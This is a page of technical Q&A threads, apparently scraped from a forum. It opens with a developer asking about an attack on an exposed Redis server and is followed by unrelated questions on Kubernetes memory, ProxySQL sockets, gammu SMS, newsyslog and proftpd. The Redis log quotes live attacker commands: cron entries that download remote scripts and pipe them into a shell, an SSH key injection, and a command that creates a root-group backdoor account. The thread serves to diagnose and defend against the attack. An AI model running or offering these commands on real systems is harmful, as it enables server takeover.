attempt to hack host machine via redis open port - bash

I have redis with open port in my development machine, these days someone try to get access to my host machine via redis, i have console with redis montiroing and these are commands thay used to get access. I provide datetime for some commands as well.
GMT: Monday, August 21, 2017 4:47:53.384 AM [0 74.82.47.3:46986] "INFO"
[0 94.74.81.202:55564] "COMMAND"
[0 94.74.81.202:55564] "flushall"
[0 94.74.81.202:55606] "COMMAND"
GMT: Monday, August 21, 2017 9:21:43.586 AM [0 94.74.81.202:55606] "set" "crackit" "\n\n\nssh-rsa .....<ssh_key>.... redis#redis.io\n\n\n\n"
[0 94.74.81.202:55646] "COMMAND"
[0 185.163.109.66:40470] "INFO"
[0 185.163.109.66:40470] "SCAN" "9000"
[0 74.82.47.5:39660] "INFO"
[0 98.142.140.13:51586] "INFO"
[0 98.142.140.13:51586] "SET" "sxyxgboqet" "\n\n*/1 * * * * /usr/bin/curl -fsSL http://98.142.140.13:8220/test11.sh | sh\n\n"
[0 52.14.111.241:58464] "SET" "lololili" "\n\n*/1\t*\t*\t*\t*\troot\tcurl http://112.74.29.139:8898/1.sh|bash\n\n"
[0 106.2.120.103:41329] "INFO"
GMT: Tuesday, August 22, 2017 9:56:04.350 PM [0 178.62.175.211:58716] "eval" "local asnum ... see link below "
... the full lua script ...
[0 184.105.247.252:33152] "INFO"
GMT: Wednesday, August 23, 2017 7:18:35.995 AM [0 52.14.111.241:49208] "SET" "lololili" "\n\n*/1\t*\t*\t*\t*\troot\t(useradd -G root axis2;(echo 'asdf1234' | passwd --stdin axis2) || (echo 'axis2:
asdf1234' |chpasswd));crontab -r;:>/etc/crontab;\n\n"
GMT: Wednesday, August 23, 2017 6:04:36.397 PM [0 98.142.140.13:43540] "INFO"
GMT: Thursday, August 24, 2017 5:22:26.931 AM [0 216.218.206.68:19396] "INFO"
these lines from my redis.log file
22 Aug 09:59:29.865 AM * RDB: 6 MB of memory used by copy-on-write
22 Aug 09:59:29.951 AM * Background saving terminated with success
22 Aug 09:59:30.137 AM # Failed opening the RDB file crontab (in server root dir /etc) for saving: Permission denied
23 Aug 07:18:36.049 AM * 1 changes in 900 seconds. Saving...
23 Aug 07:18:36.052 AM * Background saving started by pid 25388
23 Aug 07:18:36.054 AM # Failed opening the RDB file crontab (in server root dir /etc) for saving: Permission denied
23 Aug 07:18:36.153 AM # Background saving error
.............
repeated every 6 minutes
Can anybody explain what exaclty doing lua script? according to redis log, i guess, it tried to eval bash command which holds in "lololili" key.
thank you in advance.

Hi it's an attempt to hack your machine. You should not expose your redis on the internet without proprer firewalling.
Judging by waht I've seen I guess this one is trying to exit the lua sandobx.
There is multiplie way to hack your machine if you got an open redis server.
by exiting the lua sandbox (tried successfully on a redis 2.8.4 with the attached gist a bit modified)
by uploading bad scripts in an attempt to get them executed by you or your softwares by error. (suing the db
some references on lua sandbox exit
http://benmmurphy.github.io/blog/2015/06/04/redis-eval-lua-sandbox-escape/
https://gist.github.com/firsov/4393cc162ff87e00324a6a53a353bda2
and redis file upload
https://packetstormsecurity.com/files/134200/Redis-Remote-Command-Execution.html
You should check any file belonging to redis on your host
find / -user redis
If you found nothing, good for you, but secure your server.

Related

Memory builds up overtime on Kubernetes pod causing JVM unable to start

We are running a kubernetes environment and we have a pod that is encountering memory issues. The pod runs only a single container, and this container is responsible for running various utility jobs throughout the day.
The issue is that this pod's memory usage grows slowly over time. There is a 6 GB memory limit for this pod, and eventually, the memory consumption grows very close to 6GB.
A lot of our utility jobs are written in Java, and when the JVM spins up for them, they require -Xms256m in order to start. Yet, since the pod's memory is growing over time, eventually it gets to the point where there isn't 256MB free to start the JVM, and the Linux oom-killer kills the java process. Here is what I see from dmesg when this occurs:
[Thu Feb 18 17:43:13 2021] Memory cgroup stats for /kubepods/burstable/pod4f5d9d31-71c5-11eb-a98c-023a5ae8b224/921550be41cd797d9a32ed7673fb29ea8c48dc002a4df63638520fd7df7cf3f9: cache:8KB rss:119180KB rss_huge:0KB mapped_file:0KB swap:0KB inactive_anon:0KB active_anon:119132KB inactive_file:8KB active_file:0KB unevictable:4KB
[Thu Feb 18 17:43:13 2021] [ pid ] uid tgid total_vm rss nr_ptes swapents oom_score_adj name
[Thu Feb 18 17:43:13 2021] [ 5579] 0 5579 253 1 4 0 -998 pause
[Thu Feb 18 17:43:13 2021] [ 5737] 0 5737 3815 439 12 0 907 entrypoint.sh
[Thu Feb 18 17:43:13 2021] [13411] 0 13411 1952 155 9 0 907 tail
[Thu Feb 18 17:43:13 2021] [28363] 0 28363 3814 431 13 0 907 dataextract.sh
[Thu Feb 18 17:43:14 2021] [28401] 0 28401 768177 32228 152 0 907 java
[Thu Feb 18 17:43:14 2021] Memory cgroup out of memory: Kill process 28471 (Finalizer threa) score 928 or sacrifice child
[Thu Feb 18 17:43:14 2021] Killed process 28401 (java), UID 0, total-vm:3072708kB, anon-rss:116856kB, file-rss:12056kB, shmem-rss:0kB
Based on research I've been doing, here for example, it seems like it is normal on Linux to grow in memory consumption over time as various caches grow. From what I understand, cached memory should also be freed when new processes (such as my java process) begin to run.
My main question is: should this pod's memory be getting freed in order for these java processes to run? If so, are there any steps I can take to begin to debug why this may not be happening correctly?
Aside from this concern, I've also been trying to track down what is responsible for the growing memory in the first place. I was able to narrow it down to a certain job that runs every 15 minutes. I noticed that after every time it ran, used memory for the pod grew by ~.1 GB.
I was able to figure this out by running this command (inside the container) before and after each execution of the job:
cat /sys/fs/cgroup/memory/memory.usage_in_bytes | numfmt --to si
From there I narrowed down the piece of bash code from which the memory seems to consistently grow. That code looks like this:
while [ "z${_STATUS}" != "z0" ]
do
RES=`$CURL -X GET "${TS_URL}/wcs/resources/admin/index/dataImport/status?jobStatusId=${JOB_ID}"`
_STATUS=`echo $RES | jq -r '.status.status' || exit 1`
PROGRES=`echo $RES | jq -r '.status.progress' || exit 1`
[ "x$_STATUS" == "x1" ] && exit 1
[ "x$_STATUS" == "x3" ] && exit 3
[ $CNT -gt 10 ] && PrintLog "WC Job ($JOB_ID) Progress: $PROGRES Status: $_STATUS " && CNT=0
sleep 10
((CNT++))
done
[ "z${_STATUS}" == "z0" ] && STATUS=Success || STATUS=Failed
This piece of code seems innocuous to me at first glance, so I do not know where to go from here.
I would really appreciate any help, I've been trying to get to the bottom of this issue for days now.
I did eventually get to the bottom of this so I figured I'd post my solution here. I mentioned in my original post that I narrowed down my issue to the while loop that I posted above in my question. Each time the job in question ran, that while loop would iterate maybe 10 times. After the while loop completed, I noticed that utilized memory increased by 100MB each time pretty consistently.
On a hunch, I had a feeling the CURL command within the loop could be the culprit. And in fact, it did turn out that CURL was eating up my memory and not releasing it for whatever reason. Instead of looping and running the following CURL command:
RES=`$CURL -X GET "${TS_URL}/wcs/resources/admin/index/dataImport/status?jobStatusId=${JOB_ID}"`
I replaced this command with a simple python script that utilized the requests module to check our job statuses instead.
I am not sure still why CURL was the culprit in this case. After running CURL --version it appears that the underlying library being used is libcurl/7.29.0. Maybe there is an bug within that library version causing some issues with memory management, but that is just a guess.
In any case, switching from using python's requests module instead of CURL has resolved my issue.

Connecting to ProxySQL via socket - "No such file or directory"

I am trying to connect to ProxySQL from PHP with mysqlnd using the local socket, but I get
"No such file or directory"
, as the socket would not exist. The same code can connect to the mysql socket with no problem.
Basically I am reproducing what was described at:
https://www.percona.com/blog/2017/09/19/proxysql-improves-mysql-ssl-connections/
<?php
$i = 10000;
$user = 'percona';
$pass = 'percona';
while($i>=0) {
$mysqli = mysqli_init();
// ProxySQL
$link = mysqli_real_connect($mysqli, "localhost", $user, $pass, "", 6033, "/tmp/proxysql.sock")
or die(mysqli_connect_error());
$info = mysqli_get_host_info($mysqli);
$i--;
mysqli_close($mysqli);
unset($mysqli);
}
?>
This throws:
mysqli_real_connect(): (HY000/2002): No such file or directory
The socket file (/tmp/proxysql.sock) is in fact there:
$ ls -all /tmp
total 12
drwxrwxrwt. 11 root root 4096 Oct 7 17:33 .
dr-xr-xr-x. 28 root root 4096 Sep 20 17:42 ..
drwxrwxrwt. 2 root root 6 Aug 8 02:40 .font-unix
drwxrwxrwt. 2 root root 6 Aug 8 02:40 .ICE-unix
srwxrwxrwx 1 proxysql proxysql 0 Oct 7 17:11 proxysql.sock
I can use the mysql client to connect through it:
$ mysql -u myuser -p --socket /tmp/proxysql.sock --prompt='ProxySQLClient> '
If in the above PHP code I replace the socket file with the MySQL socket, then that works. It is only the proxysql.sock which doesn't work with mysqlnd.
I am using:
mysqlnd version mysqlnd 5.0.12-dev - 20150407
ProxySQL version 2.0.6
Any idea why the proxysql.sock is not accepted by mysqlnd?
UPDATE: Following #EternalHour's suggestion below, I have also tried moving the proxysql.sock file out of /tmp, but unfortunately that didn't make a difference. I am still receiving the same error.
EDIT (2019-10-08): It turns out this issue has nothing to do with PHP, as netcat throws the same problem too, whether the socket files in in /tmp or in /var/sockets/:
$ nc -U /tmp/proxysql.sock
Ncat: No such file or directory.
Out of the 3 nodes of the ProxySQL cluster running on the same OS, same kernel version, 1 has this issue, the other 2 allows connection to the socket file in /tmp/proxsql.sock, although over there too, sometimes restarting ProxySQL results in the socket file being created as private (eg not available to other applications)
Many MySQL Clients have a special handling of the wordlocalhost. localhost doesn't mean "use the resolver to resolve localhost and connect via TCP" but "use unix domain socket on the default path" to use TCP use 127.0.0.1 instead. If proxySQL also provides a unix domain socket provide that path.
I am sorry everyone, the issue was embarrassingly simple - it was simply my fault.
When I was changing the socket file's location in ProxySQL Admin I was using the following
update global_variables set variable_value='0.0.0.0:6033;/tmp/proxysql.sock ' where variable_name='mysql-interfaces';
SAVE MYSQL VARIABLES TO DISK;
Yes, that is a space at the end of "/tmp/proxysql.sock ".
When I was changing it to different locations, I only rewrote the first half of that (the folder), never the filename, so I just keep copying the space and hence always got file or directory not found...
Problem solved!
Sorry about it

Gammu stops receiving SMS after a while

I have a problem that's been bugging me for a while now. I've been searching for solutions for 2 weeks now without any result. These guys have the same problem as me but no answers there..
I'm running gammu (1.31) and gammu-smsd on a Rpi with raspbian.
Using a Huawei E367.
Don't know why I got 3 devices /dev/ttyUSB0, /dev/ttyUSB1, /dev/ttyUSB2
Since I don't know the difference between these I tried different settings and got it running with the following; gammuconf ttyUSB0 and gammu-smsdrc ttyUSB2. Both as root and normal users.
Sending SMS works great. Then comes the problem. Receiving SMS works for a while, then just stops. If I reboot the system it starts to work again. For a while, but the same thing happens after a while.
# Configuration file for Gammu SMS Daemon
# Gammu library configuration, see gammurc(5)
[gammu]
# Please configure this!
port = /dev/ttyUSB2
connection = at
# Debugging
#logformat = textall
# SMSD configuration, see gammu-smsdrc(5)
[smsd]
service = files
logfile = /home/pi/gammu/log/log_smsdrc.txt
# Increase for debugging information
debuglevel = 0
# Paths where messages are stored
inboxpath = /home/pi/gammu/inbox/
outboxpath = /home/pi/gammu/outbox/
sentsmspath = /home/pi/gammu/sent/
errorsmspath = /home/pi/gammu/error/
ReceiveFrequency = 2
LoopSleep = 1
GammuCoding = utf8
CommTimeout = 0
#RunOnReceive =
Log
Tue 2015/03/31 11:05:19 gammu-smsd[7379]: Starting phone communication...
Tue 2015/03/31 11:07:07 gammu-smsd[7379]: Terminating communication...
Tue 2015/03/31 11:07:26 gammu-smsd[2091]: Warning: No PIN code in /etc/gammu-smsdrc file
Tue 2015/03/31 11:07:26 gammu-smsd[2116]: Created POSIX RW shared memory at 0xb6f6d000
Tue 2015/03/31 11:07:26 gammu-smsd[2116]: Starting phone communication...
Tue 2015/03/31 11:07:26 gammu-smsd[2116]: Error at init connection: Error opening device, it doesn't exist. (DEVICENOTEXIST[4])
Tue 2015/03/31 11:07:26 gammu-smsd[2116]: Starting phone communication...
Tue 2015/03/31 11:07:26 gammu-smsd[2116]: Error at init connection: Error opening device, it doesn't exist. (DEVICENOTEXIST[4])
Tue 2015/03/31 11:07:26 gammu-smsd[2116]: Starting phone communication...
Tue 2015/03/31 11:07:26 gammu-smsd[2116]: Error at init connection: Error opening device, it doesn't exist. (DEVICENOTEXIST[4])
Tue 2015/03/31 11:07:26 gammu-smsd[2116]: Starting phone communication...
Tue 2015/03/31 11:07:26 gammu-smsd[2116]: Error at init connection: Error
opening device, it doesn't exist. (DEVICENOTEXIST[4])
Tue 2015/03/31 11:07:26 gammu-smsd[2116]: Going to 30 seconds sleep because of too much connection errors
Tue 2015/03/31 11:08:14 gammu-smsd[2116]: Starting phone communication...
Tue 2015/03/31 11:08:21 gammu-smsd[2116]: Soft reset return code: Function not supported by phone. (NOTSUPPORTED[21])
Tue 2015/03/31 11:08:27 gammu-smsd[2116]: Read 2 messages
Tue 2015/03/31 11:08:27 gammu-smsd[2116]: Received
IN20150331_110600_00_+xxxxxx_00.txt
Tue 2015/03/31 11:08:27 gammu-smsd[2116]: Received
IN20150331_110820_00_+xxxxxx_00.txt
Tue 2015/03/31 11:09:38 gammu-smsd[2116]: Read 1 messages
Tue 2015/03/31 11:09:38 gammu-smsd[2116]: Received
IN20150331_110934_00_+xxxxxx_00.txt
Tue 2015/03/31 11:13:57 gammu-smsd[2116]: Read 1 messages
Tue 2015/03/31 11:13:57 gammu-smsd[2116]: Received
IN20150331_111352_00_+xxxxxx_00.txt
I guess the early warnings are before my modeswitch command kicks in.
in rc.local:
sudo usb_modeswitch -v 0x12d1 -p 0x1446 -V 0x12d1 -P 0x1506 -m 0x01 -M 55534243123456780000000000000011062000000100000000000000000000 -I
I have the same Problem, so I wrote a shell script to reactivate the clean-quick /dev/ttyUSB[0-2] device, and then added it to cron job
*/5 * * * * /home/sysadmin/scripts/reanimate-usb-stick.sh >/dev/null 2>&1
reanimate-usb-stick.sh
#!/bin/bash
export PATH="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin"
USBDEVICES=$(ls -l /dev/* | awk '/\/dev\/ttyUSB[0-7]/ {print $6}' | wc -l)
DEVICEINFO=""
DEVICEPORT=""
if [ $USBDEVICES = 0 ]
then
datas=$(lsusb | grep -i hua | awk '/Bus/ {print $6}' | tr ":" "\n")
counter=0
for line in $datas
do
counter=$((counter+1))
if [ $counter = 1 ]
then
DEVICEINFO=$(echo "$line")
fi
if [ $counter = 2 ]
then
DEVICEPORT=$(echo "$line")
fi
done
usb_modeswitch -v $DEVICEINFO -p $DEVICEPORT -J
echo "$DEVICEINFO - $DEVICEPORT"
else
echo "ALLES OK : $USBDEVICES"
exit
fi
This looks pretty much same as https://github.com/gammu/gammu/issues/4 and even though there were some attempts to fix this in Gammu, it seems that the Huawei modems firmware is simply not stable enough for this usage. Simply asking it several times for listing received messages makes it unresponsive.
Also which device you use might make slight difference, see Gammu manual and dd-wrt wiki for more information on that topic.
I had similar problem with Huawei 3g modem e1750. I added following lines to /etc/gammu-smsdrc file:
ReceiveFrequency = 60
StatusFrequency = 60
CommTimeout = 60
SendTimeout = 60
LoopSleep = 10
CheckSecurity = 0
The idea is to minimalize ammount of communication between gammu-smsd and 3g modem. Especially the default value LoopSleep=1 means that gammu sends commands to modem each second and it could be too much for modem firmware, so I used 10.
Next thing is something standard in all Raspberry/ARM embedded projects: Use powerfull power source. I'm using charger with fixed cable (I belive that some reusable cables could be inappriopriate for currents above 2A) that looks like that:
http://botland.com.pl/9240-thickbox_default/zasilacz-extreme-microusb-5v-21a-raspberry-pi.jpg
With that the modem still hangs after about 50-100 hours of operation, but it's enouth for my project.

Use newsyslog to rotate log files, but only if they have a certain size

I'm on OS X 10.9.4 and trying to use newsyslog to rotate my app development log files.
More specifically, I want to rotate the files daily but only if they are not empty (newsyslog writes one or two lines to every logfile it rotates, so let's say I only want to rotate logs that are at least 1kb).
I created a file /etc/newsyslog.d/code.conf:
# logfilename [owner:group] mode count size when flags [/pid_file] [sig_num]
/Users/manuel/code/**/log/*.log manuel:staff 644 7 1 $D0 GN
The way I understand the man page for the configuration file is that size and when conditions should work in combination, so logfiles should be rotated every night at midnight only if they are 1kb or larger.
Unfortunately this is not what happens. The log files are rotated every night, no matter if they only the rotation message from newsyslog or anything else:
~/code/myapp/log (master) $ ls
total 32
drwxr-xr-x 6 manuel staff 204B Aug 8 00:17 .
drwxr-xr-x 22 manuel staff 748B Jul 25 14:56 ..
-rw-r--r-- 1 manuel staff 64B Aug 8 00:17 development.log
-rw-r--r-- 1 manuel staff 153B Aug 8 00:17 development.log.0
~/code/myapp/log (master) $ cat development.log
Aug 8 00:17:41 localhost newsyslog[81858]: logfile turned over
~/code/myapp/log (master) $ cat development.log.0
Aug 7 00:45:17 Manuels-MacBook-Pro newsyslog[34434]: logfile turned over due to size>1K
Aug 8 00:17:41 localhost newsyslog[81858]: logfile turned over
Any tips on how to get this working would be appreciated!
What you're looking for (rotate files daily unless they haven't logged anything) isn't possible using newsyslog. The man page you referenced doesn't say anything about size and when being combined other than to say that if when isn't specified, than it is as-if only size was specified. The reality is that the log is rotated when either condition is met. If the utility is like its FreeBSD counterpart, it won't rotate logs less than 512 bytes in size unless the binary flag is set.
MacOS' newer replacement for newsyslog, ASL, also doesn't have the behavior you desire. As far as I know, the only utility which has this is logrotate using its notifempty configuration option. You can install logrotate on your Mac using Homebrew

error: unable to open /dev/null for stdin: No such file or directory

I cannot get a simple trigger on proftpd working. Here is what I did:
<IfModule mod_exec.c>
ExecEngine on
ExecOptions logStderr logStdout
ExecLog /var/log/proftpd/exec.log
ExecOnCommand APPE,STOR /usr/local/bin/proftptest.sh %u %f
</IfModule>
however it keeps on failing with:
Jan 21 17:31:07 mod_exec/0.9.9[22514]: already saw this Exec, skipping
Jan 21 17:31:07 mod_exec/0.9.9[22514]: already saw this Exec, skipping
Jan 21 17:31:07 mod_exec/0.9.9[22514]: preparing to execute '/usr/local/bin/proftptest.sh' with uid 117 (euid 117), gid 65534 (egid 65534)
Jan 21 17:31:07 mod_exec/0.9.9[22514]: + '/usr/local/bin/proftptest.sh': argv[1] = ftp
Jan 21 17:31:07 mod_exec/0.9.9[22514]: + '/usr/local/bin/proftptest.sh': argv[2] = /home/ftp/incoming/Examples.txt
Jan 21 17:31:07 mod_exec/0.9.9[22514]: error: unable to open /dev/null for stdin: No such file or directory
Jan 21 17:31:07 mod_exec/0.9.9[22514]: STOR ExecOnCommand '/usr/local/bin/proftptest.sh' failed: No such file or directory
Jan 21 17:31:07 mod_exec/0.9.9[22514]: already saw this Exec, skipping
Jan 21 17:31:07 mod_exec/0.9.9[22514]: already saw this Exec, skipping
However the script seems fine (running from my user session, default env):
$ ls -al /usr/local/bin/proftptest.sh
-rwxr-xr-x 1 root root 97 Jan 21 17:25 /usr/local/bin/proftptest.sh
I am NOT using DefaultRoot:
$ grep Default /etc/proftpd/proftpd.conf
DefaultServer on
# DefaultRoot ~
What could I possibly be missing ?
As expained in the documentation:
http://www.castaglia.org/proftpd/modules/mod_exec.html#Usage
This module will not work properly for <Anonymous> logins
This document the symptoms, but does not solve the real issue, so moving on to a different ftp server...

Resources